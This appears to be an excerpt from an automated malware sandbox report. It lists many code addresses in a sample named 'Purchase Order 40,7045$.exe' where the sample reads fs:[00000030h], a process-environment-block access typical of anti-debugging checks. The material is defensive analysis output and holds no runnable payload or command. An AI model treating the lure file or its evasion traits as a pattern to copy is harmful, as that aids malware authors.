Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC927A mov eax, dword ptr fs:[00000030h]	1_2_00FC927A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104138A mov eax, dword ptr fs:[00000030h]	1_2_0104138A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01055BA5 mov eax, dword ptr fs:[00000030h]	1_2_01055BA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]	1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]	1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]	1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]	1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]	1_2_010053CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]	1_2_010053CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]	1_2_00FC4A2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]	1_2_00FC4A2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA3A1C mov eax, dword ptr fs:[00000030h]	1_2_00FA3A1C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]	1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F85210 mov ecx, dword ptr fs:[00000030h]	1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]	1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]	1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]	1_2_00F8AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]	1_2_00F8AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F98A0A mov eax, dword ptr fs:[00000030h]	1_2_00F98A0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]	1_2_0104AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]	1_2_0104AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FADBE9 mov eax, dword ptr fs:[00000030h]	1_2_00FADBE9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104EA55 mov eax, dword ptr fs:[00000030h]	1_2_0104EA55
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01014257 mov eax, dword ptr fs:[00000030h]	1_2_01014257
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]	1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]	1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]	1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]	1_2_0103B260
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]	1_2_0103B260
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058A62 mov eax, dword ptr fs:[00000030h]	1_2_01058A62
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBB390 mov eax, dword ptr fs:[00000030h]	1_2_00FBB390
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2397 mov eax, dword ptr fs:[00000030h]	1_2_00FB2397
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]	1_2_00F91B8F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]	1_2_00F91B8F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]	1_2_00FB3B7A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]	1_2_00FB3B7A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8DB60 mov ecx, dword ptr fs:[00000030h]	1_2_00F8DB60
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8F358 mov eax, dword ptr fs:[00000030h]	1_2_00F8F358
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8DB40 mov eax, dword ptr fs:[00000030h]	1_2_00F8DB40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058D34 mov eax, dword ptr fs:[00000030h]	1_2_01058D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0100A537 mov eax, dword ptr fs:[00000030h]	1_2_0100A537
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104E539 mov eax, dword ptr fs:[00000030h]	1_2_0104E539
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01003540 mov eax, dword ptr fs:[00000030h]	1_2_01003540
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01033D40 mov eax, dword ptr fs:[00000030h]	1_2_01033D40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9849B mov eax, dword ptr fs:[00000030h]	1_2_00F9849B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA746D mov eax, dword ptr fs:[00000030h]	1_2_00FA746D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]	1_2_010505AC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]	1_2_010505AC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA44B mov eax, dword ptr fs:[00000030h]	1_2_00FBA44B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov ecx, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]	1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBBC2C mov eax, dword ptr fs:[00000030h]	1_2_00FBBC2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01038DF1 mov eax, dword ptr fs:[00000030h]	1_2_01038DF1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]	1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]	1_2_0105740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]	1_2_0105740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]	1_2_0105740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]	1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]	1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]	1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]	1_2_01006C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]	1_2_00F9D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]	1_2_00F9D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00FB1DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00FB1DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00FB1DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h]	1_2_0101C450
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h]	1_2_0101C450
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB35A1 mov eax, dword ptr fs:[00000030h]	1_2_00FB35A1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h]	1_2_00FBFD9B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h]	1_2_00FBFD9B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]	1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]	1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]	1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]	1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]	1_2_00F82D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]	1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]	1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]	1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]	1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h]	1_2_00FAC577
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h]	1_2_00FAC577
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA7D50 mov eax, dword ptr fs:[00000030h]	1_2_00FA7D50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC3D43 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D43
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]	1_2_00FB4D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]	1_2_00FB4D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]	1_2_00FB4D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8AD30 mov eax, dword ptr fs:[00000030h]	1_2_00F8AD30
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]	1_2_00F93D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058CD6 mov eax, dword ptr fs:[00000030h]	1_2_01058CD6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]	1_2_01006CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]	1_2_01006CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]	1_2_01006CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010414FB mov eax, dword ptr fs:[00000030h]	1_2_010414FB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105070D mov eax, dword ptr fs:[00000030h]	1_2_0105070D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0105070D mov eax, dword ptr fs:[00000030h]	1_2_0105070D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h]	1_2_0101FF10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h]	1_2_0101FF10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB16E0 mov ecx, dword ptr fs:[00000030h]	1_2_00FB16E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F976E2 mov eax, dword ptr fs:[00000030h]	1_2_00F976E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB36CC mov eax, dword ptr fs:[00000030h]	1_2_00FB36CC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC8EC7 mov eax, dword ptr fs:[00000030h]	1_2_00FC8EC7
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058F6A mov eax, dword ptr fs:[00000030h]	1_2_01058F6A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FAAE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9766D mov eax, dword ptr fs:[00000030h]	1_2_00F9766D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]	1_2_01007794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]	1_2_01007794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]	1_2_01007794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]	1_2_00F97E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8E620 mov eax, dword ptr fs:[00000030h]	1_2_00F8E620
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h]	1_2_00FBA61C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h]	1_2_00FBA61C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]	1_2_00F8C600
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]	1_2_00F8C600
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]	1_2_00F8C600
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB8E00 mov eax, dword ptr fs:[00000030h]	1_2_00FB8E00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC37F5 mov eax, dword ptr fs:[00000030h]	1_2_00FC37F5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01041608 mov eax, dword ptr fs:[00000030h]	1_2_01041608
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103FE3F mov eax, dword ptr fs:[00000030h]	1_2_0103FE3F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h]	1_2_0104AE44
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h]	1_2_0104AE44
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F98794 mov eax, dword ptr fs:[00000030h]	1_2_00F98794
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101FE87 mov eax, dword ptr fs:[00000030h]	1_2_0101FE87
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9FF60 mov eax, dword ptr fs:[00000030h]	1_2_00F9FF60
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]	1_2_01050EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]	1_2_01050EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]	1_2_01050EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010046A7 mov eax, dword ptr fs:[00000030h]	1_2_010046A7
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9EF40 mov eax, dword ptr fs:[00000030h]	1_2_00F9EF40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103FEC0 mov eax, dword ptr fs:[00000030h]	1_2_0103FEC0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBE730 mov eax, dword ptr fs:[00000030h]	1_2_00FBE730
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058ED6 mov eax, dword ptr fs:[00000030h]	1_2_01058ED6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h]	1_2_00F84F2E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h]	1_2_00F84F2E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAF716 mov eax, dword ptr fs:[00000030h]	1_2_00FAF716
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h]	1_2_00FBA70E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h]	1_2_00FBA70E
